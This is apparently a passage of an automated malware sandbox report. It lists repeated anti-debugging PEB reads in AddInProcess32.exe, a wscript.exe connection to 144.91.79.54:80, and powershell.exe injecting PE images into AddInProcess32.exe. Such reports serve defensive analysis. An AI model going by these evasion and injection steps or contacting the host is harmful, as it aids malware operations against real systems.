          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15A9 mov eax, dword ptr fs:[00000030h]5_2_018C15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15A9 mov eax, dword ptr fs:[00000030h]5_2_018C15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15A9 mov eax, dword ptr fs:[00000030h]5_2_018C15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15A9 mov eax, dword ptr fs:[00000030h]5_2_018C15A9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019335BA mov eax, dword ptr fs:[00000030h]5_2_019335BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019335BA mov eax, dword ptr fs:[00000030h]5_2_019335BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019335BA mov eax, dword ptr fs:[00000030h]5_2_019335BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019335BA mov eax, dword ptr fs:[00000030h]5_2_019335BA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195F5BE mov eax, dword ptr fs:[00000030h]5_2_0195F5BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019205A7 mov eax, dword ptr fs:[00000030h]5_2_019205A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019205A7 mov eax, dword ptr fs:[00000030h]5_2_019205A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019205A7 mov eax, dword ptr fs:[00000030h]5_2_019205A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CF5B0 mov eax, dword ptr fs:[00000030h]5_2_018CF5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C45B1 mov eax, dword ptr fs:[00000030h]5_2_018C45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C45B1 mov eax, dword ptr fs:[00000030h]5_2_018C45B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019735D7 mov eax, dword ptr fs:[00000030h]5_2_019735D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019735D7 mov eax, dword ptr fs:[00000030h]5_2_019735D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019735D7 mov eax, dword ptr fs:[00000030h]5_2_019735D7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D5D0 mov eax, dword ptr fs:[00000030h]5_2_0191D5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D5D0 mov ecx, dword ptr fs:[00000030h]5_2_0191D5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE5CF mov eax, dword ptr fs:[00000030h]5_2_018DE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE5CF mov eax, dword ptr fs:[00000030h]5_2_018DE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D55C0 mov eax, dword ptr fs:[00000030h]5_2_018D55C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C95DA mov eax, dword ptr fs:[00000030h]5_2_018C95DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A65D0 mov eax, dword ptr fs:[00000030h]5_2_018A65D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DA5D0 mov eax, dword ptr fs:[00000030h]5_2_018DA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DA5D0 mov eax, dword ptr fs:[00000030h]5_2_018DA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019755C9 mov eax, dword ptr fs:[00000030h]5_2_019755C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DC5ED mov eax, dword ptr fs:[00000030h]5_2_018DC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DC5ED mov eax, dword ptr fs:[00000030h]5_2_018DC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A25E0 mov eax, dword ptr fs:[00000030h]5_2_018A25E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE5E7 mov eax, dword ptr fs:[00000030h]5_2_018CE5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15F4 mov eax, dword ptr fs:[00000030h]5_2_018C15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15F4 mov eax, dword ptr fs:[00000030h]5_2_018C15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15F4 mov eax, dword ptr fs:[00000030h]5_2_018C15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15F4 mov eax, dword ptr fs:[00000030h]5_2_018C15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15F4 mov eax, dword ptr fs:[00000030h]5_2_018C15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C15F4 mov eax, dword ptr fs:[00000030h]5_2_018C15F4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D7505 mov eax, dword ptr fs:[00000030h]5_2_018D7505
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D7505 mov ecx, dword ptr fs:[00000030h]5_2_018D7505
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01974500 mov eax, dword ptr fs:[00000030h]5_2_01974500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01975537 mov eax, dword ptr fs:[00000030h]5_2_01975537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0194F525 mov eax, dword ptr fs:[00000030h]5_2_0194F525
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE53E mov eax, dword ptr fs:[00000030h]5_2_018CE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE53E mov eax, dword ptr fs:[00000030h]5_2_018CE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE53E mov eax, dword ptr fs:[00000030h]5_2_018CE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE53E mov eax, dword ptr fs:[00000030h]5_2_018CE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018CE53E mov eax, dword ptr fs:[00000030h]5_2_018CE53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195B52F mov eax, dword ptr fs:[00000030h]5_2_0195B52F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DD530 mov eax, dword ptr fs:[00000030h]5_2_018DD530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DD530 mov eax, dword ptr fs:[00000030h]5_2_018DD530
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0535 mov eax, dword ptr fs:[00000030h]5_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0535 mov eax, dword ptr fs:[00000030h]5_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0535 mov eax, dword ptr fs:[00000030h]5_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0535 mov eax, dword ptr fs:[00000030h]5_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0535 mov eax, dword ptr fs:[00000030h]5_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018B0535 mov eax, dword ptr fs:[00000030h]5_2_018B0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AD534 mov eax, dword ptr fs:[00000030h]5_2_018AD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AD534 mov eax, dword ptr fs:[00000030h]5_2_018AD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AD534 mov eax, dword ptr fs:[00000030h]5_2_018AD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AD534 mov eax, dword ptr fs:[00000030h]5_2_018AD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AD534 mov eax, dword ptr fs:[00000030h]5_2_018AD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AD534 mov eax, dword ptr fs:[00000030h]5_2_018AD534
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A8550 mov eax, dword ptr fs:[00000030h]5_2_018A8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A8550 mov eax, dword ptr fs:[00000030h]5_2_018A8550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D656A mov eax, dword ptr fs:[00000030h]5_2_018D656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D656A mov eax, dword ptr fs:[00000030h]5_2_018D656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D656A mov eax, dword ptr fs:[00000030h]5_2_018D656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189B562 mov eax, dword ptr fs:[00000030h]5_2_0189B562
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DB570 mov eax, dword ptr fs:[00000030h]5_2_018DB570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DB570 mov eax, dword ptr fs:[00000030h]5_2_018DB570
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189B480 mov eax, dword ptr fs:[00000030h]5_2_0189B480
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A9486 mov eax, dword ptr fs:[00000030h]5_2_018A9486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A9486 mov eax, dword ptr fs:[00000030h]5_2_018A9486
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A64AB mov eax, dword ptr fs:[00000030h]5_2_018A64AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0192A4B0 mov eax, dword ptr fs:[00000030h]5_2_0192A4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D34B0 mov eax, dword ptr fs:[00000030h]5_2_018D34B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D44B0 mov ecx, dword ptr fs:[00000030h]5_2_018D44B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019754DB mov eax, dword ptr fs:[00000030h]5_2_019754DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A04E5 mov ecx, dword ptr fs:[00000030h]5_2_018A04E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_019494E0 mov eax, dword ptr fs:[00000030h]5_2_019494E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C340D mov eax, dword ptr fs:[00000030h]5_2_018C340D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D8402 mov eax, dword ptr fs:[00000030h]5_2_018D8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D8402 mov eax, dword ptr fs:[00000030h]5_2_018D8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018D8402 mov eax, dword ptr fs:[00000030h]5_2_018D8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189E420 mov eax, dword ptr fs:[00000030h]5_2_0189E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189E420 mov eax, dword ptr fs:[00000030h]5_2_0189E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189E420 mov eax, dword ptr fs:[00000030h]5_2_0189E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189C427 mov eax, dword ptr fs:[00000030h]5_2_0189C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_01926420 mov eax, dword ptr fs:[00000030h]5_2_01926420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DA430 mov eax, dword ptr fs:[00000030h]5_2_018DA430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0195F453 mov eax, dword ptr fs:[00000030h]5_2_0195F453
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AB440 mov eax, dword ptr fs:[00000030h]5_2_018AB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AB440 mov eax, dword ptr fs:[00000030h]5_2_018AB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AB440 mov eax, dword ptr fs:[00000030h]5_2_018AB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AB440 mov eax, dword ptr fs:[00000030h]5_2_018AB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AB440 mov eax, dword ptr fs:[00000030h]5_2_018AB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018AB440 mov eax, dword ptr fs:[00000030h]5_2_018AB440
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018DE443 mov eax, dword ptr fs:[00000030h]5_2_018DE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0189645D mov eax, dword ptr fs:[00000030h]5_2_0189645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018C245A mov eax, dword ptr fs:[00000030h]5_2_018C245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0197547F mov eax, dword ptr fs:[00000030h]5_2_0197547F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018A1460 mov eax, dword ptr fs:[00000030h]5_2_018A1460

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DB0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 340000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1100000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1330000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1100000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1310000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1300000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1310000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1150000 value starts with: 4D5A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 540000 value starts with: 4D5A
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DB0000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DB1000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: E1F008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 340000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 341000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 5AB008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1100000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1101000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F7D008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1330000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1331000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1020008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1100000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1101000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: EBF008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1310000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1311000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1052008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1300000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 1301000
